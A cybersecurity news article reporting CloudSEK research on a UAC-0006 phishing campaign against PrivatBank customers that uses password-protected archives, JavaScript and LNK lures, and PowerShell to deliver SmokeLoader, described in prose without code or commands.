Ukraine’s largest bank PrivatBank Targeted with SmokeLoader malware

UAC-0006, a financially motivated threat actor, targets PrivatBank customers with advanced phishing attacks. CloudSEK’s research reveals malicious emails containing password-protected archives to deploy SmokeLoader malware, enabling data theft and unauthorized access.

A phishing campaign is underway, targeting customers of PrivatBank, Ukraine’s largest state-owned bank. Cybersecurity researchers at CloudSEK have linked this activity to the financially motivated threat actor group UAC-0006.

The campaign, active since at least November 2024, utilizes deceptive emails containing password-protected archives (such as invoice-related PDFs) disguised as legitimate documents like payment instructions or scanned copies of personal identification.

For example, one phishing lure contains a JavaScript file named Плaтiжнa iнcтpyкцiя №187-ФГ вiд 19.12.2024p.pdf.js (translated as “Payment instruction No. 187-FY dated 19.12.2024p.pdf.js”), appearing as a legitimate payment document. Their purpose is to deliver malicious payloads designed to compromise victims’ systems and around 2 dozen unique instances have been detected in the wild so far.

According to CloudSEK’s blog post, shared with Hackread.com, in this campaign, the attackers have employed versatile techniques to evade detection, including password-protecting the archives and using legitimate system binaries in the infection chain.

Malicious PDF used in the campaign (Via CloudSEC)

The attack typically starts with a phishing email containing an attached password-protected ZIP or RAR file. Upon opening the attachment and entering the password, a malicious JavaScript file is extracted and executed, and this file then injects code into a legitimate Windows process. In turn, it runs an encoded PowerShell command.

The PowerShell script performs two key functions: it displays a decoy PDF document to the victim, masking the malicious activity, and it contacts the attacker’s command-and-control (C2) server to download and execute the SmokeLoader malware. Researchers assessed that the threat actors have begun using LNK files as lures as well, which directly execute PowerShell scripts to retrieve and run the malware hosted on their C2 servers.

UAC-0006 displays a clear preference for phishing lures with malicious capabilities and extensive use of PowerShell in their attacks with the use of JavaScript, VBScript, and LNK files. Their persistent targeting of PrivatBank customers strongly suggests a focus on financial gain.

Also, researchers observed overlaps in their TTPs with EmpireMonkey and the infamous Russia-linked FIN7 group, indicating a connection with Russian APT activity. For your information, FIN7 has links to the Black Basta ransomware operation.

It is also worth noting that SmokeLoader, has been actively used in campaigns targeting Ukraine, often attributed to Russian threat actors for espionage and financial gain.

Hackread.com previously reported Fortinet discovering a campaign delivering SmokeLoader malware targeting Taiwanese companies in manufacturing, healthcare, and IT sectors, using phishing emails with malicious attachments. According to Trend Micro’s recent research, Russian threat actors exploited a zero-day vulnerability in the 7-Zip archiving utility to execute malicious code and deploy SmokeLoader. These instances indicate the seriousness of the threat posed by SmokeLoader.

The recent campaign is crucial as it can result in compromising sensitive personal and financial data, credential harvesting and espionage, and reputational damage to the organization. It also introduces the risk of supply chain attacks, potentially affecting various associated organizations.